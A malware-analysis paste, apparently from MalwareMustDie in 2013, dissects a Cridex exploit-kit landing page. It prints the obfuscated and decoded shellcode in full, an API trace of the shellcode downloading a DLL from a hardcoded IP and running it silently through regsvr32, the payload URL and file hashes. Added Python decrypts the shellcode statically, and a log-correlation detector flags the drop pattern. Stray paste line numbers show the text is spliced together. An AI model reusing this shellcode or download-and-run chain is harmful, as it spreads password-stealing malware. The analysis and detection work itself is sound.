#MalwareMustDie - Trojan PWS Win32/Cridex at 198,104,62,49

MalwareMustDie, Mar 5th, 2013
======================================
#MalwareMustDie! @unixfreaxjp | PoC of:
Trojan PWS Win32/Cridex at 198,104,62,49
======================================

--2013-03-06 04:53:22--  h00p://198,104,62,49:8080/forum/links/column.php
seconds 0.00, Connecting to 198,104,62,49:8080... seconds 0.00, connected.
  :
GET /forum/links/column.php HTTP/1.0
Host: 198,104,62,49:8080
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
HTTP request sent, awaiting response...
  :
HTTP/1.1 200 OK
Server: nginx/1.0.4
Date: Tue, 05 Mar 2013 19:53:01 GMT
Content-Type: text/html; charset=CP-1251
Connection: close
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
200 OK
Length: unspecified [text/html]
Saving to: `column.php'
2013-03-06 04:53:26 (108 KB/s) - `column.php' saved [156809]

// decoded it first...
// and see the shellcode:

   :
function getShellCode(){
  // Obfuscated shellcode: every %uXXXX token is stored backwards as "XXXX!%"
  // and the whole string is reversed. The literal is split across lines here
  // only for display; in the landing page it is one string.
  var a = "8200!%6482!%1551!%e004!%51c5!%c4e5!%34e0!%5191!%e0c4!%9174!%2421!%2191!%b191!%3421!%2191!%" +
    "9134!%b121!%21b1!%b1a1!%5421!%2191!%9134!%e521!%51a1!%95d4!%e5e0!%21a1!%b181!%7421!%2191!%" +
    "a1e5!%5421!%5191!%24e4!%8571!%8504!%6460!%d554!%7444!%70b4!%34b5!%1464!%7044!%d554!%74a5!%" +
    "70e4!%0181!%0181!%1121!%60c1!%e1a1!%c160!%9181!%0160!%9111!%7070!%8521!%c5c5!%8504!%2370!%" +
    "15e1!%eee6!%3733!%2e2a!%59b1!%7492!%621a!%6d2a!%4c0b!%6662!%7d6a!%6d7d!%0c4b!%e702!%6d7d!%" +
    "8224!%ce24!%82d5!%8a71!%2df6!%82d5!%8a71!%b3f6!%a23c!%423c!%babe!%e7c2!%b77d!%3c42!%82ba!%" +
    "c224!%7de7!%82b7!%e324!%8ed5!%c3da!%7de7!%2482!%b7f7!%2482!%2482!%9697!%53c2!%0ac6!%c281!%" +
    "2a9e!%8217!%5312!%eec6!%4444!%60c4!%53d2!%fec6!%a4c5!%f585!%5382!%fec6!%1e97!%0cb1!%423a!%" +
    "7de7!%8282!%0d82!%b704!%b580!%8050!%c002!%fec6!%b1a1!%e5a5!%c0c2!%fec6!%f4b5!%a5d4!%c2c0!%" +
    "42fe!%47c0!%825a!%9282!%4cc2!%a59a!%a23c!%7d3c!%7d7d!%0c94!%3a0c!%ce02!%e3ba!%c77d!%4454!%" +
    "d5a5!%8204!%6482!%0474!%7dbc!%bed2!%83ba!%3a67!%3a4c!%87d7!%8e13!%87ba!%8282!%7d82!%8604!%" +
    "8724!%8207!%8282!%0c82!%ac1d!%7d7d!%0b7d!%170c!%24d2!%3afd!%0402!%bd3a!%eb3c!%c5b2!%42b1!%" +
    "8a55!%0480!%583a!%3cb7!%17be!%3867!%b2de!%c23a!%5f3a!%0fb2!%423a!%c7c0!%4c7d!%5ae6!%4236!%" +
    "e43a!%b25f!%67c0!%673a!%d5ec!%3173!%3c9d!%2f86!%52b2!%9e3e!%c502!%01ad!%6983!%3f72!%deb1!%" +
    "58b2!%964d!%1e16!%ddb1!%80b2!%3ae5!%dde7!%05b2!%c5d1!%413a!%3ad5!%97e7!%3c46!%971c!%ccd5!%" +
    "c0da!%fac1!%d53d!%11e2!%bee6!%8681!%093a!%7d7d!%d383!%9a6c!%b140!%b2c5!%6741!%e43a!%b13f!%" +
    "e502!%e73a!%8543!%423a!%3a86!%8681!%c43a!%b18e!%1c77!%d5c1!%dacc!%ffff!%beff!%508e!%afbe!%" +
    "042e!%0382!%ef08!%9eb0!%6618!%139c!%0185!%cfbe!%4ecf!%6638!%1414!%1414!%1414!%";
  // Reverse the string character by character, then turn each "%!" into "%u":
  // the result is a normal %u-escaped (UTF-16LE) shellcode string.
  a = a.split("").reverse().join("");
  return a["replace"](/\%!/g, "%" + "u");
};

// crackz!..
// output... shellcode!

var a ="%u4141%u4141%u8366%ufce4%uebfc%u5810%uc931%u8166%u0be9%u80fe%u2830%ue240%uebfa%ue805%uffeb%uffff%uccad%u1c5d%u77c1%ue81b%ua34c%u1868%u68a3%ua324%u3458%ua37e%u205e%uf31b%ua34e%u1476%u5c2b%u041b%uc6a9%u383d%ud7d7%ua390%u1868%u6eeb%u2e11%ud35d%u1caf%uad0c%u5dcc%uc179%u64c3%u7e79%u5da3%ua314%u1d5c%u2b50%u7edd%u5ea3%u2b08%u1bdd%u61e1%ud469%u2b85%u1bed%u27f3%u3896%uda10%u205c%ue3e9%u2b25%u68f2%ud9c3%u3713%uce5d%ua376%u0c76%uf52b%ua34e%u6324%u6ea5%ud7c4%u0c7c%ua324%u2bf0%ua3f5%ua32c%ued2b%u7683%ueb71%u7bc3%ua385%u0840%u55a8%u1b24%u2b5c%uc3be%ua3db%u2040%udfa3%u2d42%uc071%ud7b0%ud7d7%ud1ca%u28c0%u2828%u7028%u4278%u4068%u28d7%u2828%uab78%u31e8%u7d78%uc4a3%u76a3%uab38%u2deb%ucbd7%u4740%u2846%u4028%u5a5d%u4544%ud77c%uab3e%u20ec%uc0a3%u49c0%ud7d7%uc3d7%uc32a%ua95a%u2cc4%u2829%ua528%u0c74%uef24%u0c2c%u4d5a%u5b4f%u6cef%u2c0c%u5a5e%u1a1b%u6cef%u200c%u0508%u085b%u407b%u28d0%u2828%u7ed7%ua324%u1bc0%u79e1%u6cef%u2835%u585f%u5c4a%u6cef%u2d35%u4c06%u4444%u6cee%u2135%u7128%ue9a2%u182c%u6ca0%u2c35%u7969%u2842%u2842%u7f7b%u2842%u7ed7%uad3c%u5de8%u423e%u7b28%u7ed7%u422c%uab28%u24c3%ud77b%u2c7e%uebab%uc324%uc32a%u6f3b%u17a8%u5d28%u6fd2%u17a8%u5d28%u42ec%u4228%ud7d6%u207e%ub4c0%ud7d6%ua6d7%u2666%ub0c4%ua2d6%ua126%u2947%u1b95%ua2e2%u3373%u6eee%u1e51%u0732%u4058%u5c5c%u1258%u0707%u1119%u0610%u1819%u061c%u1a1e%u1c06%u1211%u1810%u1810%u4e07%u5a47%u455d%u4407%u4641%u5b43%u4b07%u4447%u455d%u0646%u4058%u1758%u4e42%u1915%u1245%u5e1a%u1912%u1247%u181b%u1a12%u0e5e%u4d59%u1a15%u125e%u4319%u1912%u1245%u1a1b%u1b12%u121b%u4319%u1912%u1243%u191b%u1912%u1242%u4719%u4c0e%u1915%u0e43%u5e4c%u5c15%u400e%u1551%u2846%u0028";
document.write(a);
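Reversing the string and swapping "%!" for "%u" only gets you back the %u-escaped blob; that blob is still a self-decrypting shellcode, so nothing readable appears until it has been turned into bytes and run through its own XOR loop. The Python below is an added example, not code from the paste: it takes the literal copied out of getShellCode() above, repeats the JavaScript transformation, converts the %uXXXX escapes into the UTF-16LE bytes they occupy in memory, reads the single-byte XOR key, payload length and payload offset out of the decoder stub that this sample starts with (xor ecx,ecx / sub cx,imm16 / xor byte [eax],key / inc eax / loop, with a call back into the loop that pushes the payload address), decrypts that region, and pulls the download URL out of the result. The stub parser is written for the byte pattern seen in this sample and is not a general unpacker.

```python
import re
import struct

# The obfuscated literal from getShellCode() above, copied from the paste.
# The line breaks are only Python implicit concatenation; it is one string.
OBFUSCATED = (
    "8200!%6482!%1551!%e004!%51c5!%c4e5!%34e0!%5191!%e0c4!%9174!%2421!%2191!%b191!%3421!%2191!%"
    "9134!%b121!%21b1!%b1a1!%5421!%2191!%9134!%e521!%51a1!%95d4!%e5e0!%21a1!%b181!%7421!%2191!%"
    "a1e5!%5421!%5191!%24e4!%8571!%8504!%6460!%d554!%7444!%70b4!%34b5!%1464!%7044!%d554!%74a5!%"
    "70e4!%0181!%0181!%1121!%60c1!%e1a1!%c160!%9181!%0160!%9111!%7070!%8521!%c5c5!%8504!%2370!%"
    "15e1!%eee6!%3733!%2e2a!%59b1!%7492!%621a!%6d2a!%4c0b!%6662!%7d6a!%6d7d!%0c4b!%e702!%6d7d!%"
    "8224!%ce24!%82d5!%8a71!%2df6!%82d5!%8a71!%b3f6!%a23c!%423c!%babe!%e7c2!%b77d!%3c42!%82ba!%"
    "c224!%7de7!%82b7!%e324!%8ed5!%c3da!%7de7!%2482!%b7f7!%2482!%2482!%9697!%53c2!%0ac6!%c281!%"
    "2a9e!%8217!%5312!%eec6!%4444!%60c4!%53d2!%fec6!%a4c5!%f585!%5382!%fec6!%1e97!%0cb1!%423a!%"
    "7de7!%8282!%0d82!%b704!%b580!%8050!%c002!%fec6!%b1a1!%e5a5!%c0c2!%fec6!%f4b5!%a5d4!%c2c0!%"
    "42fe!%47c0!%825a!%9282!%4cc2!%a59a!%a23c!%7d3c!%7d7d!%0c94!%3a0c!%ce02!%e3ba!%c77d!%4454!%"
    "d5a5!%8204!%6482!%0474!%7dbc!%bed2!%83ba!%3a67!%3a4c!%87d7!%8e13!%87ba!%8282!%7d82!%8604!%"
    "8724!%8207!%8282!%0c82!%ac1d!%7d7d!%0b7d!%170c!%24d2!%3afd!%0402!%bd3a!%eb3c!%c5b2!%42b1!%"
    "8a55!%0480!%583a!%3cb7!%17be!%3867!%b2de!%c23a!%5f3a!%0fb2!%423a!%c7c0!%4c7d!%5ae6!%4236!%"
    "e43a!%b25f!%67c0!%673a!%d5ec!%3173!%3c9d!%2f86!%52b2!%9e3e!%c502!%01ad!%6983!%3f72!%deb1!%"
    "58b2!%964d!%1e16!%ddb1!%80b2!%3ae5!%dde7!%05b2!%c5d1!%413a!%3ad5!%97e7!%3c46!%971c!%ccd5!%"
    "c0da!%fac1!%d53d!%11e2!%bee6!%8681!%093a!%7d7d!%d383!%9a6c!%b140!%b2c5!%6741!%e43a!%b13f!%"
    "e502!%e73a!%8543!%423a!%3a86!%8681!%c43a!%b18e!%1c77!%d5c1!%dacc!%ffff!%beff!%508e!%afbe!%"
    "042e!%0382!%ef08!%9eb0!%6618!%139c!%0185!%cfbe!%4ecf!%6638!%1414!%1414!%1414!%"
)


def deobfuscate(s: str) -> str:
    """Replicate getShellCode(): reverse the string, then '%!' -> '%u'."""
    return s[::-1].replace("%!", "%u")


def unescape_u(s: str) -> bytes:
    """Turn %uXXXX escapes into the bytes they occupy in a UTF-16LE JS string."""
    words = re.findall(r"%u([0-9a-fA-F]{4})", s)
    if len(words) * 6 != len(s):
        raise ValueError("unexpected characters in %u-encoded shellcode")
    return b"".join(struct.pack("<H", int(w, 16)) for w in words)


def parse_xor_stub(sc: bytes):
    """Key, length and payload offset of this sample's decoder stub:
         31 c9              xor ecx, ecx
         66 81 e9 LO HI     sub cx, imm16   -> cx = 0x10000 - imm16 = length
         80 30 KEY          xor byte [eax], KEY
         40                 inc eax
         e2 fa              loop
         e8 eb ff ff ff     call back into the loop; the pushed return address
                            is the byte right after the call = payload start
    """
    m_key = re.search(rb"\x80\x30(.)\x40\xe2\xfa", sc, re.S)
    m_len = re.search(rb"\x66\x81\xe9(..)", sc, re.S)
    m_call = re.search(rb"\xe8\xeb\xff\xff\xff", sc)
    if not (m_key and m_len and m_call):
        raise ValueError("decoder stub not found")
    key = m_key.group(1)[0]
    length = (0x10000 - struct.unpack("<H", m_len.group(1))[0]) & 0xFFFF
    return key, length, m_call.end()


def decrypt(sc: bytes) -> bytes:
    """Apply the stub's single-byte XOR to exactly the region the loop covers."""
    key, length, start = parse_xor_stub(sc)
    body = bytes(b ^ key for b in sc[start:start + length])
    return sc[:start] + body + sc[start + length:]


def extract_urls(data: bytes):
    return [u.decode("ascii") for u in re.findall(rb"https?://[!-~]+", data)]


def analyse(obfuscated: str = OBFUSCATED) -> dict:
    sc = unescape_u(deobfuscate(obfuscated))
    key, length, start = parse_xor_stub(sc)
    return {"key": key, "length": length, "start": start,
            "size": len(sc), "urls": extract_urls(decrypt(sc))}


if __name__ == "__main__":
    r = analyse()
    print(f"shellcode {r['size']} bytes, XOR key 0x{r['key']:02x}, "
          f"{r['length']} bytes encrypted from offset {r['start']}")
    for url in r["urls"]:
        print("embedded URL:", url)
```

The URL that falls out of the decrypted bytes is the one URLDownloadToFileA is seen fetching in the API trace below, so the static pass confirms the sandbox result without executing anything. Because the key is a single byte applied position-independently, any other plaintext strings in the payload become visible the same way; the API names are not among them here, which is consistent with the shellcode resolving them by hash.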

// API call trace of the shellcode (what it does once it runs):

0x7c801ad9 kernel32.VirtualProtect(lpAddress=0x4020cf, dwSize=255)
0x7c801d7b kernel32.LoadLibraryA(lpFileName=urlmon)
0x7c835dfa kernel32.GetTempPathA(lpBuffer=0x22fc60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\])
0x1a494bbe urlmon.URLDownloadToFileA(pCaller=0, szURL=h00p://198,104,62,49:8080/forum/links/column.php?jf=1m:2v:1o:30:2v&qe=2v:1k:1m:32:33:1k:1k:31:1j:1o&d=1k&dv=t&hy=n, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll)
0x7c86250d kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
0x7c86250d kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
0x7c81cb3b kernel32.TerminateThread(dwExitCode=0)
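The trace is the whole drop chain from the endpoint's point of view: the browser process writes a .dll into the user's Temp directory, then regsvr32 is started with -s to load it quietly. That sequence is cheap to catch in endpoint telemetry. The Python below is an added example, not part of the paste; it runs simple correlation logic over constructed Sysmon-style log lines (the key=value format and the sample events are invented for the example, with the paths taken from the trace above) and scores a regsvr32 launch higher when the module sits in Temp, the registration is silent, the parent is a browser or plugin host, and the same file was just written by such a process.

```python
import re
from datetime import datetime, timedelta

# Constructed Sysmon-style log lines (not from the paste). id=11 is FileCreate,
# id=1 is ProcessCreate. The first two lines are what the API trace above would
# look like from the endpoint; the last two are benign look-alikes.
SAMPLE_LOG = r"""2013-03-05T20:03:50Z id=11 image=C:\Program Files\Internet Explorer\iexplore.exe target=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll
2013-03-05T20:03:51Z id=1 parent=C:\Program Files\Internet Explorer\iexplore.exe image=C:\WINDOWS\system32\regsvr32.exe cmd=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll
2013-03-05T20:10:00Z id=1 parent=C:\WINDOWS\system32\msiexec.exe image=C:\WINDOWS\system32\regsvr32.exe cmd=regsvr32 /s "C:\Program Files\Vendor\control.ocx"
2013-03-05T20:12:00Z id=1 parent=C:\WINDOWS\explorer.exe image=C:\WINDOWS\system32\regsvr32.exe cmd=regsvr32 C:\DOCUME~1\Administrator\LOCALS~1\Temp\setup.dll
"""

KV_RE = re.compile(r"(\w+)=(.*?)(?=\s+\w+=|$)")        # key=value, values may contain spaces
TEMP_RE = re.compile(r"\\(?:LOCALS~1\\Temp|AppData\\Local\\Temp)\\", re.I)
SILENT_RE = re.compile(r"(?:^|\s)[-/]s(?=\s|$)", re.I)   # regsvr32 -s or /s
MODULE_RE = re.compile(r'"?([A-Za-z]:\\[^"]+?\.(?:dll|ocx))"?(?=\s|$)', re.I)
BROWSER_LIKE = {"iexplore.exe", "firefox.exe", "chrome.exe", "opera.exe",
                "java.exe", "javaw.exe", "acrord32.exe"}


def parse(line: str) -> dict:
    ts, rest = line.split(" ", 1)
    ev = dict(KV_RE.findall(rest))
    ev["ts"] = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")
    return ev


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def detect(log_text: str, window: timedelta = timedelta(minutes=5)) -> list:
    """Alert on regsvr32 loading a module from the user's Temp directory.
    Each extra indicator (silent flag, browser-like parent, module freshly
    dropped by a browser-like process) adds a reason; 3+ reasons is 'high'."""
    dropped = {}   # lower-cased path -> (write time, writer image name)
    alerts = []
    for line in log_text.splitlines():
        ev = parse(line)
        if ev["id"] == "11":
            target = ev["target"]
            if TEMP_RE.search(target) and target.lower().endswith(".dll"):
                dropped[target.lower()] = (ev["ts"], basename(ev["image"]))
            continue
        if ev["id"] != "1" or basename(ev["image"]) != "regsvr32.exe":
            continue
        m = MODULE_RE.search(ev["cmd"])
        if not m or not TEMP_RE.search(m.group(1)):
            continue
        path = m.group(1)
        reasons = ["regsvr32 loading a module from the user Temp directory"]
        if SILENT_RE.search(ev["cmd"]):
            reasons.append("silent (-s) registration")
        if basename(ev["parent"]) in BROWSER_LIKE:
            reasons.append("spawned by a browser/plugin host")
        drop = dropped.get(path.lower())
        if drop and drop[1] in BROWSER_LIKE and timedelta(0) <= ev["ts"] - drop[0] <= window:
            age = int((ev["ts"] - drop[0]).total_seconds())
            reasons.append(f"module was written by {drop[1]} {age}s earlier")
        alerts.append({"ts": ev["ts"], "path": path, "reasons": reasons,
                       "level": "high" if len(reasons) >= 3 else "low"})
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_LOG):
        print(a["ts"].isoformat(), a["level"].upper(), a["path"])
        for r in a["reasons"]:
            print("   -", r)
```

The FileCreate correlation is what separates the exploit-kit drop from an installer registering its own COM server: the msiexec line never alerts because its module is outside Temp, and the explorer-launched setup.dll only reaches "low" because nothing browser-like wrote it and the registration is not silent. On a real sensor the write and the regsvr32 launch can arrive out of order, so the lookup should be keyed on the normalised path, as here, and tolerant of the window.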
  67.  
  68. //payload url:
  69.  
  70. h00p://198,104,62,49:8080/forum/links/column・php?jf=1m:2v:1o:30:2v&qe=2v:1k:1m:32:33:1k:1k:31:1j:1o&d=1k&dv=t&hy=n
  71.  
// fetch it...

--2013-03-06 05:04:11--  h00p://198,104,62,49:8080/forum/links/column.php?jf=1m:2v:1o:30:2v&qe=2v:1k:1m:32:33:1k:1k:31:1j:1o&d=1k&dv=t&hy=n
seconds 0.00, Connecting to 198,104,62,49:8080... seconds 0.00, connected.
  :
GET /forum/links/column.php?jf=1m:2v:1o:30:2v&qe=2v:1k:1m:32:33:1k:1k:31:1j:1o&d=1k&dv=t&hy=n HTTP/1.0
Host: 198,104,62,49:8080
HTTP request sent, awaiting response...
  :
HTTP/1.1 200 OK
Server: nginx/1.0.4
Date: Tue, 05 Mar 2013 20:03:49 GMT
Content-Type: application/x-msdownload
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Pragma: public
Expires: Tue, 05 Mar 2013 20:03:51 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Disposition: attachment; filename="about.exe"
Content-Transfer-Encoding: binary
Content-Length: 102400
200 OK
Length: 102400 (100K) [application/x-msdownload]
Saving to: `about.exe'
2013-03-06 05:04:15 (84.8 KB/s) - `about.exe' saved [102400/102400]

Download snapshot: http://urlquery.net/report.php?id=1270484

// file info:

2013/03/06  05:04  102,400 about.exe 31de2e1b48a8341c3732b97e61712a56

Same sample on VirusTotal (submitted there under the name docprop.dll):

// Virus Total check...

URL: https://www.virustotal.com/en/file/a7a2e20afb5d04ea9798e21559d6cbbe575785d6d9d00c0693ae90a299d8d405/analysis/1362504075/
SHA256: a7a2e20afb5d04ea9798e21559d6cbbe575785d6d9d00c0693ae90a299d8d405
SHA1: 014fe37cd0b08936b54dabb2d44ca0901f741184
MD5: 31de2e1b48a8341c3732b97e61712a56
File size: 100.0 KB ( 102400 bytes )
File name: docprop.dll
File type: Win32 EXE
Tags: peexe
Detection ratio: 2 / 46 <========== VERY LOW!!!
Analysis date: 2013-03-05 17:08:27 UTC ( 14 minutes ago )

Fortinet      : W32/Kryptik.ALRY!tr
Kaspersky   : UDS:DangerousObject.Multi.Generic


----
#MalwareMustDie!!
@unixfreaxjp